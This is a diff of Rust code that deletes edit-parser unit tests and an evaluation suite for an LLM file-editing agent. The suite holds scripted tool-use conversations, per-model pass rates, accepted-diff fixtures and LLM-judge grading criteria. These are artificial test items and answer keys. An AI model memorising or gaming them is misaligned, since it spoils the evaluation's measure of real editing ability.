old_text: "xml style old".to_string(), - new_text: "xml style new".to_string(), - line_hint: None, - },] - ); - assert_eq!( - xml_parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - - // Test diff-fenced format parser only parses diff markers - let mut diff_parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! {" - xml style oldxml style new - - <<<<<<< SEARCH - diff style old - ======= - diff style new - >>>>>>> REPLACE - "}, - &mut diff_parser, - &mut rng - ), - vec![Edit { - old_text: "diff style old".to_string(), - new_text: "diff style new".to_string(), - line_hint: None, - },] - ); - assert_eq!( - diff_parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_diff_fenced_empty_sections(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! {" - <<<<<<< SEARCH - ======= - >>>>>>> REPLACE - "}, - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "".to_string(), - new_text: "".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_diff_fenced_with_line_hint(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - let edits = parse_random_chunks( - indoc! {" - <<<<<<< SEARCH line=42 - original text - ======= - updated text - >>>>>>> REPLACE - "}, - &mut parser, - &mut rng, - ); - assert_eq!( - edits, - vec![Edit { - old_text: "original text".to_string(), - line_hint: Some(42), - new_text: "updated text".to_string(), - }] - ); - } - #[gpui::test(iterations = 100)] - fn test_xml_line_hints(mut rng: StdRng) { - // Line hint is a single quoted line number - let mut parser = EditParser::new(EditFormat::XmlTags); - - let edits = parse_random_chunks( - r#" - original code - updated code"#, - &mut parser, - &mut rng, - ); - - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "original code"); - assert_eq!(edits[0].line_hint, Some(23)); - assert_eq!(edits[0].new_text, "updated code"); - - // Line hint is a single unquoted line number - let mut parser = EditParser::new(EditFormat::XmlTags); - - let edits = parse_random_chunks( - r#" - original code - updated code"#, - &mut parser, - &mut rng, - ); - - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "original code"); - assert_eq!(edits[0].line_hint, Some(45)); - assert_eq!(edits[0].new_text, "updated code"); - - // Line hint is a range - let mut parser = EditParser::new(EditFormat::XmlTags); - - let edits = parse_random_chunks( - r#" - original code - updated code"#, - &mut parser, - &mut rng, - ); - - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "original code"); - assert_eq!(edits[0].line_hint, Some(23)); - assert_eq!(edits[0].new_text, "updated code"); - - // No line hint - let mut parser = EditParser::new(EditFormat::XmlTags); - let edits = parse_random_chunks( - r#" - old - new"#, - &mut parser, - &mut rng, - ); - - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "old"); - assert_eq!(edits[0].line_hint, None); - assert_eq!(edits[0].new_text, "new"); - } - - #[derive(Default, Debug, PartialEq, Eq)] - struct Edit { - old_text: String, - new_text: String, - line_hint: Option, - } - - fn parse_random_chunks(input: &str, parser: &mut EditParser, rng: &mut StdRng) -> Vec { - let chunk_count = rng.random_range(1..=cmp::min(input.len(), 50)); - let mut chunk_indices = (0..input.len()).choose_multiple(rng, chunk_count); - chunk_indices.sort(); - chunk_indices.push(input.len()); - - let mut old_text = Some(String::new()); - let mut new_text = None; - let mut pending_edit = Edit::default(); - let mut edits = Vec::new(); - let mut last_ix = 0; - for chunk_ix in chunk_indices { - for event in parser.push(&input[last_ix..chunk_ix]) { - match event { - EditParserEvent::OldTextChunk { - chunk, - done, - line_hint, - } => { - old_text.as_mut().unwrap().push_str(&chunk); - if done { - pending_edit.old_text = old_text.take().unwrap(); - pending_edit.line_hint = line_hint; - new_text = Some(String::new()); - } - } - EditParserEvent::NewTextChunk { chunk, done } => { - new_text.as_mut().unwrap().push_str(&chunk); - if done { - pending_edit.new_text = new_text.take().unwrap(); - edits.push(pending_edit); - pending_edit = Edit::default(); - old_text = Some(String::new()); - } - } - } - } - last_ix = chunk_ix; - } - - if new_text.is_some() { - pending_edit.new_text = new_text.take().unwrap(); - edits.push(pending_edit); - } - - edits - } -} diff --git a/crates/agent/src/edit_agent/evals.rs b/crates/agent/src/edit_agent/evals.rs deleted file mode 100644 index 7e4f314afd0db2..00000000000000 --- a/crates/agent/src/edit_agent/evals.rs +++ /dev/null @@ -1,1701 +0,0 @@ -use super::*; -use crate::{ - AgentTool, EditFileMode, EditFileTool, EditFileToolInput, GrepTool, GrepToolInput, - ListDirectoryTool, ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, -}; -use Role::*; -use client::{Client, RefreshLlmTokenListener, UserStore}; -use eval_utils::{EvalOutput, EvalOutputProcessor, OutcomeKind}; -use fs::FakeFs; -use futures::{FutureExt, future::LocalBoxFuture}; -use gpui::{AppContext, TestAppContext}; -use http_client::StatusCode; -use indoc::{formatdoc, indoc}; -use language_model::{ - LanguageModelRegistry, LanguageModelToolResult, LanguageModelToolResultContent, - LanguageModelToolUse, LanguageModelToolUseId, SelectedModel, -}; -use project::Project; -use prompt_store::{ProjectContext, WorktreeContext}; -use rand::prelude::*; -use reqwest_client::ReqwestClient; -use serde_json::json; -use std::{ - fmt::{self, Display}, - path::Path, - str::FromStr, - time::Duration, -}; -use util::path; - -#[derive(Default, Clone, Debug)] -struct EditAgentOutputProcessor { - mismatched_tag_threshold: f32, - cumulative_tags: usize, - cumulative_mismatched_tags: usize, - eval_outputs: Vec>, -} - -fn mismatched_tag_threshold(mismatched_tag_threshold: f32) -> EditAgentOutputProcessor { - EditAgentOutputProcessor { - mismatched_tag_threshold, - cumulative_tags: 0, - cumulative_mismatched_tags: 0, - eval_outputs: Vec::new(), - } -} - -#[derive(Clone, Debug)] -struct EditEvalMetadata { - tags: usize, - mismatched_tags: usize, -} - -impl EvalOutputProcessor for EditAgentOutputProcessor { - type Metadata = EditEvalMetadata; - - fn process(&mut self, output: &EvalOutput) { - if matches!(output.outcome, OutcomeKind::Passed | OutcomeKind::Failed) { - self.cumulative_mismatched_tags += output.metadata.mismatched_tags; - self.cumulative_tags += output.metadata.tags; - self.eval_outputs.push(output.clone()); - } - } - - fn assert(&mut self) { - let mismatched_tag_ratio = - self.cumulative_mismatched_tags as f32 / self.cumulative_tags as f32; - if mismatched_tag_ratio > self.mismatched_tag_threshold { - for eval_output in &self.eval_outputs { - println!("{}", eval_output.data); - } - panic!( - "Too many mismatched tags: {:?}", - self.cumulative_mismatched_tags - ); - } - } -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_extract_handle_command_output() { - // Test how well agent generates multiple edit hunks. - // - // Model | Pass rate - // ----------------------------|---------- - // claude-3.7-sonnet | 0.99 (2025-06-14) - // claude-sonnet-4 | 0.97 (2025-06-14) - // gemini-2.5-pro-06-05 | 0.98 (2025-06-16) - // gemini-2.5-flash | 0.11 (2025-05-22) - - let input_file_path = "root/blame.rs"; - let input_file_content = include_str!("evals/fixtures/extract_handle_command_output/before.rs"); - let possible_diffs = vec![ - include_str!("evals/fixtures/extract_handle_command_output/possible-01.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-02.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-03.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-04.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-05.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-06.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-07.diff"), - ]; - let edit_description = "Extract `handle_command_output` method from `run_git_blame`."; - eval_utils::eval(100, 0.95, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(formatdoc! {" - Read the `{input_file_path}` file and extract a method in - the final stanza of `run_git_blame` to deal with command failures, - call it `handle_command_output` and take the std::process::Output as the only parameter. - Do not document the method and do not add any comments. - - Add it right next to `run_git_blame` and copy it verbatim from `run_git_blame`. - "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - input_file_content, - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::assert_diff_any(possible_diffs.clone()), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_delete_run_git_blame() { - // Model | Pass rate - // ----------------------------|---------- - // claude-3.7-sonnet | 1.0 (2025-06-14) - // claude-sonnet-4 | 0.96 (2025-06-14) - // gemini-2.5-pro-06-05 | 1.0 (2025-06-16) - // gemini-2.5-flash | - - let input_file_path = "root/blame.rs"; - let input_file_content = include_str!("evals/fixtures/delete_run_git_blame/before.rs"); - let output_file_content = include_str!("evals/fixtures/delete_run_git_blame/after.rs"); - let edit_description = "Delete the `run_git_blame` function."; - - eval_utils::eval(100, 0.95, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(formatdoc! {" - Read the `{input_file_path}` file and delete `run_git_blame`. Just that - one function, not its usages. - "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - input_file_content, - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::assert_eq(output_file_content), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_translate_doc_comments() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 1.0 (2025-06-14) - // claude-sonnet-4 | 1.0 (2025-06-14) - // gemini-2.5-pro-preview-03-25 | 1.0 (2025-05-22) - // gemini-2.5-flash-preview-04-17 | - - let input_file_path = "root/canvas.rs"; - let input_file_content = include_str!("evals/fixtures/translate_doc_comments/before.rs"); - let edit_description = "Translate all doc comments to Italian"; - - eval_utils::eval(200, 1., mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(formatdoc! {" - Read the {input_file_path} file and edit it (without overwriting it), - translating all the doc comments to italian. - "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - input_file_content, - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::judge_diff("Doc comments were translated to Italian"), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_use_wasi_sdk_in_compile_parser_to_wasm() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 0.96 (2025-06-14) - // claude-sonnet-4 | 0.11 (2025-06-14) - // gemini-2.5-pro-preview-latest | 0.99 (2025-06-16) - // gemini-2.5-flash-preview-04-17 | - - let input_file_path = "root/lib.rs"; - let input_file_content = - include_str!("evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs"); - let edit_description = "Update compile_parser_to_wasm to use wasi-sdk instead of emscripten"; - - eval_utils::eval(100, 0.95, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(formatdoc! {" - Read the `{input_file_path}` file and change `compile_parser_to_wasm` to use `wasi-sdk` instead of emscripten. - Use `ureq` to download the SDK for the current platform and architecture. - Extract the archive into a sibling of `lib` inside the `tree-sitter` directory in the cache_dir. - Compile the parser to wasm using the `bin/clang` executable (or `bin/clang.exe` on windows) - that's inside of the archive. - Don't re-download the SDK if that executable already exists. - - Use these clang flags: -fPIC -shared -Os -Wl,--export=tree_sitter_{{language_name}} - - Here are the available wasi-sdk assets: - - wasi-sdk-25.0-x86_64-macos.tar.gz - - wasi-sdk-25.0-arm64-macos.tar.gz - - wasi-sdk-25.0-x86_64-linux.tar.gz - - wasi-sdk-25.0-arm64-linux.tar.gz - - wasi-sdk-25.0-x86_64-linux.tar.gz - - wasi-sdk-25.0-arm64-linux.tar.gz - - wasi-sdk-25.0-x86_64-windows.tar.gz - "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(971), - end_line: Some(1050), - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - lines(input_file_content, 971..1050), - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(1050), - end_line: Some(1100), - }, - )], - ), - message( - User, - [tool_result( - "tool_2", - ReadFileTool::NAME, - lines(input_file_content, 1050..1100), - )], - ), - message( - Assistant, - [tool_use( - "tool_3", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(1100), - end_line: Some(1150), - }, - )], - ), - message( - User, - [tool_result( - "tool_3", - ReadFileTool::NAME, - lines(input_file_content, 1100..1150), - )], - ), - message( - Assistant, - [tool_use( - "tool_4", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::judge_diff(indoc! {" - - The compile_parser_to_wasm method has been changed to use wasi-sdk - - ureq is used to download the SDK for current platform and architecture - "}), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_disable_cursor_blinking() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 0.59 (2025-07-14) - // claude-sonnet-4 | 0.81 (2025-07-14) - // gemini-2.5-pro | 0.95 (2025-07-14) - // gemini-2.5-flash-preview-04-17 | 0.78 (2025-07-14) - - let input_file_path = "root/editor.rs"; - let input_file_content = include_str!("evals/fixtures/disable_cursor_blinking/before.rs"); - let edit_description = "Comment out the call to `BlinkManager::enable`"; - let possible_diffs = vec![ - include_str!("evals/fixtures/disable_cursor_blinking/possible-01.diff"), - include_str!("evals/fixtures/disable_cursor_blinking/possible-02.diff"), - include_str!("evals/fixtures/disable_cursor_blinking/possible-03.diff"), - include_str!("evals/fixtures/disable_cursor_blinking/possible-04.diff"), - ]; - eval_utils::eval(100, 0.51, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message(User, [text("Let's research how to cursor blinking works.")]), - message( - Assistant, - [tool_use( - "tool_1", - GrepTool::NAME, - GrepToolInput { - regex: "blink".into(), - include_pattern: None, - offset: 0, - case_sensitive: false, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - GrepTool::NAME, - [ - lines(input_file_content, 100..400), - lines(input_file_content, 800..1300), - lines(input_file_content, 1600..2000), - lines(input_file_content, 5000..5500), - lines(input_file_content, 8000..9000), - lines(input_file_content, 18455..18470), - lines(input_file_content, 20000..20500), - lines(input_file_content, 21000..21300), - ] - .join("Match found:\n\n"), - )], - ), - message( - User, - [text(indoc! {" - Comment out the lines that interact with the BlinkManager. - Keep the outer `update` blocks, but comments everything that's inside (including if statements). - Don't add additional comments. - "})], - ), - message( - Assistant, - [tool_use( - "tool_4", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::assert_diff_any(possible_diffs.clone()), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_from_pixels_constructor() { - // Results for 2025-06-13 - // - // The outcome of this evaluation depends heavily on the LINE_HINT_TOLERANCE - // value. Higher values improve the pass rate but may sometimes cause - // edits to be misapplied. In the context of this eval, this means - // the agent might add from_pixels tests in incorrect locations - // (e.g., at the beginning of the file), yet the evaluation may still - // rate it highly. - // - // Model | Date | Pass rate - // ========================================================= - // claude-4.0-sonnet | 2025-06-14 | 0.99 - // claude-3.7-sonnet | 2025-06-14 | 0.88 - // gemini-2.5-pro-preview-06-05 | 2025-06-16 | 0.98 - - let input_file_path = "root/canvas.rs"; - let input_file_content = include_str!("evals/fixtures/from_pixels_constructor/before.rs"); - let edit_description = "Implement from_pixels constructor and add tests."; - - eval_utils::eval(100, 0.95, mismatched_tag_threshold(0.25), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(indoc! {" - Introduce a new `from_pixels` constructor in Canvas and - also add tests for it in the same file. - "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - input_file_content, - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - GrepTool::NAME, - GrepToolInput { - regex: "mod\\s+tests".into(), - include_pattern: Some("font-kit/src/canvas.rs".into()), - offset: 0, - case_sensitive: false, - }, - )], - ), - message( - User, - [tool_result("tool_2", GrepTool::NAME, "No matches found")], - ), - message( - Assistant, - [tool_use( - "tool_3", - GrepTool::NAME, - GrepToolInput { - regex: "mod\\s+tests".into(), - include_pattern: Some("font-kit/src/**/*.rs".into()), - offset: 0, - case_sensitive: false, - }, - )], - ), - message( - User, - [tool_result("tool_3", GrepTool::NAME, "No matches found")], - ), - message( - Assistant, - [tool_use( - "tool_4", - GrepTool::NAME, - GrepToolInput { - regex: "#\\[test\\]".into(), - include_pattern: Some("font-kit/src/**/*.rs".into()), - offset: 0, - case_sensitive: false, - }, - )], - ), - message( - User, - [tool_result( - "tool_4", - GrepTool::NAME, - indoc! {" - Found 6 matches: - - ## Matches in font-kit/src/loaders/core_text.rs - - ### mod test › L926-936 - ``` - mod test { - use super::Font; - use crate::properties::{Stretch, Weight}; - - #[cfg(feature = \"source\")] - use crate::source::SystemSource; - - static TEST_FONT_POSTSCRIPT_NAME: &'static str = \"ArialMT\"; - - #[cfg(feature = \"source\")] - #[test] - ``` - - 55 lines remaining in ancestor node. Read the file to see all. - - ### mod test › L947-951 - ``` - } - - #[test] - fn test_core_text_to_css_font_weight() { - // Exact matches - ``` - - ### mod test › L959-963 - ``` - } - - #[test] - fn test_core_text_to_css_font_stretch() { - // Exact matches - ``` - - ## Matches in font-kit/src/loaders/freetype.rs - - ### mod test › L1238-1248 - ``` - mod test { - use crate::loaders::freetype::Font; - - static PCF_FONT_PATH: &str = \"resources/tests/times-roman-pcf/timR12.pcf\"; - static PCF_FONT_POSTSCRIPT_NAME: &str = \"Times-Roman\"; - - #[test] - fn get_pcf_postscript_name() { - let font = Font::from_path(PCF_FONT_PATH, 0).unwrap(); - assert_eq!(font.postscript_name().unwrap(), PCF_FONT_POSTSCRIPT_NAME); - } - ``` - - 1 lines remaining in ancestor node. Read the file to see all. - - ## Matches in font-kit/src/sources/core_text.rs - - ### mod test › L265-275 - ``` - mod test { - use crate::properties::{Stretch, Weight}; - - #[test] - fn test_css_to_core_text_font_weight() { - // Exact matches - assert_eq!(super::css_to_core_text_font_weight(Weight(100.0)), -0.7); - assert_eq!(super::css_to_core_text_font_weight(Weight(400.0)), 0.0); - assert_eq!(super::css_to_core_text_font_weight(Weight(700.0)), 0.4); - assert_eq!(super::css_to_core_text_font_weight(Weight(900.0)), 0.8); - - ``` - - 27 lines remaining in ancestor node. Read the file to see all. - - ### mod test › L278-282 - ``` - } - - #[test] - fn test_css_to_core_text_font_stretch() { - // Exact matches - ``` - "}, - )], - ), - message( - Assistant, - [tool_use( - "tool_5", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::judge_diff(indoc! {" - - The diff contains a new `from_pixels` constructor - - The diff contains new tests for the `from_pixels` constructor - "}), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_zode() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 1.0 (2025-06-14) - // claude-sonnet-4 | 1.0 (2025-06-14) - // gemini-2.5-pro-preview-03-25 | 1.0 (2025-05-22) - // gemini-2.5-flash-preview-04-17 | 1.0 (2025-05-22) - - let input_file_path = "root/zode.py"; - let input_content = None; - let edit_description = "Create the main Zode CLI script"; - - eval_utils::eval(50, 1., mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message(User, [text(include_str!("evals/fixtures/zode/prompt.md"))]), - message( - Assistant, - [ - tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: "root/eval/react.py".into(), - start_line: None, - end_line: None, - }, - ), - tool_use( - "tool_2", - ReadFileTool::NAME, - ReadFileToolInput { - path: "root/eval/react_test.py".into(), - start_line: None, - end_line: None, - }, - ), - ], - ), - message( - User, - [ - tool_result( - "tool_1", - ReadFileTool::NAME, - include_str!("evals/fixtures/zode/react.py"), - ), - tool_result( - "tool_2", - ReadFileTool::NAME, - include_str!("evals/fixtures/zode/react_test.py"), - ), - ], - ), - message( - Assistant, - [ - text( - "Now that I understand what we need to build, I'll create the main Python script:", - ), - tool_use( - "tool_3", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Create, - }, - ), - ], - ), - ], - input_content.clone(), - EvalAssertion::new(async move |sample, _, _cx| { - let invalid_starts = [' ', '`', '\n']; - let mut message = String::new(); - for start in invalid_starts { - if sample.text_after.starts_with(start) { - message.push_str(&format!("The sample starts with a {:?}\n", start)); - break; - } - } - // Remove trailing newline. - message.pop(); - - if message.is_empty() { - Ok(EvalAssertionOutcome { - score: 100, - message: None, - }) - } else { - Ok(EvalAssertionOutcome { - score: 0, - message: Some(message), - }) - } - }), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_add_overwrite_test() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 0.65 (2025-06-14) - // claude-sonnet-4 | 0.07 (2025-06-14) - // gemini-2.5-pro-preview-03-25 | 0.35 (2025-05-22) - // gemini-2.5-flash-preview-04-17 | - - let input_file_path = "root/action_log.rs"; - let input_file_content = include_str!("evals/fixtures/add_overwrite_test/before.rs"); - let edit_description = "Add a new test for overwriting a file in action_log.rs"; - - eval_utils::eval(200, 0.5, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(indoc! {" - Introduce a new test in `action_log.rs` to test overwriting a file. - That is, a file already exists, but we call `buffer_created` as if the file were new. - Take inspiration from all the other tests in the file. - "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - indoc! {" - pub struct ActionLog [L13-20] - tracked_buffers [L15] - edited_since_project_diagnostics_check [L17] - project [L19] - impl ActionLog [L22-498] - pub fn new [L24-30] - pub fn project [L32-34] - pub fn checked_project_diagnostics [L37-39] - pub fn has_edited_files_since_project_diagnostics_check [L42-44] - fn track_buffer_internal [L46-101] - fn handle_buffer_event [L103-116] - fn handle_buffer_edited [L118-123] - fn handle_buffer_file_changed [L125-158] - async fn maintain_diff [L160-264] - pub fn buffer_read [L267-269] - pub fn buffer_created [L272-276] - pub fn buffer_edited [L279-287] - pub fn will_delete_buffer [L289-304] - pub fn keep_edits_in_range [L306-364] - pub fn reject_edits_in_ranges [L366-459] - pub fn keep_all_edits [L461-473] - pub fn changed_buffers [L476-482] - pub fn stale_buffers [L485-497] - fn apply_non_conflicting_edits [L500-561] - fn diff_snapshots [L563-585] - fn point_to_row_edit [L587-614] - enum ChangeAuthor [L617-620] - User [L618] - Agent [L619] - enum TrackedBufferStatus [L623-627] - Created [L624] - Modified [L625] - Deleted [L626] - struct TrackedBuffer [L629-641] - buffer [L630] - base_text [L631] - unreviewed_changes [L632] - status [L633] - version [L634] - diff [L635] - snapshot [L636] - diff_update [L637] - _open_lsp_handle [L638] - _maintain_diff [L639] - _subscription [L640] - impl TrackedBuffer [L643-657] - fn has_changes [L644-650] - fn schedule_diff_update [L652-656] - pub struct ChangedBuffer [L659-661] - pub diff [L660] - mod tests [L664-1574] - fn init_logger [L678-682] - fn init_test [L684-691] - async fn test_keep_edits [L694-769] - async fn test_deletions [L772-854] - async fn test_overlapping_user_edits [L857-951] - async fn test_creating_files [L954-1010] - async fn test_deleting_files [L1013-1120] - async fn test_reject_edits [L1123-1255] - async fn test_reject_multiple_edits [L1258-1331] - async fn test_reject_deleted_file [L1334-1388] - async fn test_reject_created_file [L1391-1443] - async fn test_random_diffs [L1446-1535] - fn quiesce [L1510-1534] - struct HunkStatus [L1538-1542] - range [L1539] - diff_status [L1540] - old_text [L1541] - fn unreviewed_hunks [L1544-1573] - - Showing symbols 1-69 (total symbols: 69) - - Using the line numbers in this outline, you can call this tool again while specifying - the start_line and end_line fields to see the implementations of symbols in the outline. - "}, - )], - ), - message( - Assistant, - [ - text( - "Let's look at the existing test cases that are related to file creation to understand the pattern:", - ), - tool_use( - "tool_2", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(953), - end_line: Some(1010), - }, - ), - ], - ), - message( - User, - [tool_result( - "tool_2", - ReadFileTool::NAME, - lines(input_file_content, 953..1010), - )], - ), - message( - Assistant, - [ - text( - "Now let's look at another relevant test to understand how they're structured:", - ), - tool_use( - "tool_3", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(1012), - end_line: Some(1120), - }, - ), - ], - ), - message( - User, - [tool_result( - "tool_3", - ReadFileTool::NAME, - lines(input_file_content, 1012..1120), - )], - ), - message( - Assistant, - [ - text("Now let's look at how `buffer_created` is implemented:"), - tool_use( - "tool_4", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(271), - end_line: Some(276), - }, - ), - ], - ), - message( - User, - [tool_result( - "tool_4", - ReadFileTool::NAME, - lines(input_file_content, 271..276), - )], - ), - message( - Assistant, - [ - text(indoc! {" - Based on my understanding of the existing tests and code, I'll now create a new test for overwriting a file. In this test, we'll: - - 1. Create a file - 2. Open a buffer for it - 3. Track it in the action log - 4. Modify the buffer - 5. Call `buffer_created` again as if the file were new - 6. Check that the changes are properly tracked - - Let's write the test: - "}), - tool_use( - "tool_5", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - ), - ], - ), - ], - Some(input_file_content.into()), - EvalAssertion::judge_diff( - "A new test for overwritten files was created, without changing any previous test", - ), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_create_empty_file() { - // Check that Edit Agent can create a file without writing its - // thoughts into it. This issue is not specific to empty files, but - // it's easier to reproduce with them. - // - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 1.00 (2025-06-14) - // claude-sonnet-4 | 1.00 (2025-06-14) - // gemini-2.5-pro-preview-03-25 | 1.00 (2025-05-21) - // gemini-2.5-flash-preview-04-17 | 1.00 (2025-05-21) - - let input_file_content = None; - let expected_output_content = String::new(); - - eval_utils::eval(100, 0.99, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message(User, [text("Create a second empty todo file ")]), - message( - Assistant, - [ - text(formatdoc! {" - I'll help you create a second empty todo file. - First, let me examine the project structure to see if there's already a todo file, which will help me determine the appropriate name and location for the second one. - "}), - tool_use( - "toolu_01GAF8TtsgpjKxCr8fgQLDgR", - ListDirectoryTool::NAME, - ListDirectoryToolInput { - path: "root".to_string(), - }, - ), - ], - ), - message( - User, - [tool_result( - "toolu_01GAF8TtsgpjKxCr8fgQLDgR", - ListDirectoryTool::NAME, - "root/TODO\nroot/TODO2\nroot/new.txt\n", - )], - ), - message( - Assistant, - [ - text(formatdoc! {" - I can see there's already a `TODO` file in the `root` directory. Let me create a second empty todo file called `TODO3` in the same directory: - "}), - tool_use( - "toolu_01Tb3iQ9griqSYMmVuykQPWU", - EditFileTool::NAME, - EditFileToolInput { - display_description: "Create empty TODO3 file".to_string(), - mode: EditFileMode::Create, - path: "root/TODO3".into(), - }, - ), - ], - ), - ], - input_file_content.clone(), - // Bad behavior is to write something like - // "I'll create an empty TODO3 file as requested." - EvalAssertion::assert_eq(expected_output_content.clone()), - )) - }); -} - -fn message( - role: Role, - contents: impl IntoIterator, -) -> LanguageModelRequestMessage { - LanguageModelRequestMessage { - role, - content: contents.into_iter().collect(), - cache: false, - reasoning_details: None, - } -} - -fn text(text: impl Into) -> MessageContent { - MessageContent::Text(text.into()) -} - -fn lines(input: &str, range: Range) -> String { - input - .lines() - .skip(range.start) - .take(range.len()) - .collect::>() - .join("\n") -} - -fn tool_use( - id: impl Into>, - name: impl Into>, - input: impl Serialize, -) -> MessageContent { - MessageContent::ToolUse(LanguageModelToolUse { - id: LanguageModelToolUseId::from(id.into()), - name: name.into(), - 